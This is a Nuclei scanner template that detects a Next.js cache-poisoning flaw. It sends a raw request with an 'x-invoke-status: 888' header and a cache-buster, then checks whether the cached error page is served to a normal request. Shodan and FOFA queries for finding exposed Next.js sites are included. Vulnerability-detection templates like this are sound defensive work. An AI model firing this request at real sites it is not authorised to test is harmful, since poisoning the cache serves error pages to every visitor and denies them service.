id: next-js-cache-poisoning

info:
  name: Next.js Cache Poisoning
  author: Ice3man543
  severity: high
  description: |
    Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses.
  reference:
    - https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13
    - https://github.com/valentin-panov/nextjs-no-cache-issue
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
  metadata:
    vendor: vercel
    product: next.js
    framework: node.js
    shodan-query:
      - http.html:"/_next/static"
      - cpe:"cpe:2.3:a:zeit:next.js"
    fofa-query: body="/_next/static"
  tags: cve,cve2023,next-js,cache

variables:
  rand: "{{rand_text_numeric(5)}}"

http:
  - raw:
      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}
        Priority: u=1
        x-invoke-status: 888

      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 888 && contains(body_1, '/_error')"
          - "status_code_2 == 888 && contains(body_2, '/_error')"
        condition: and
# digest: 490a004630440220431ffc17e1380ac71114b178c14ff533c132b114aaf6b6836f0f3da876cf438a022057a9d4cbba84903a9a9d2313346398135d45c8ec9cadbfc650737ffc5e174535:922c64590222798bb761d5b6d8e72950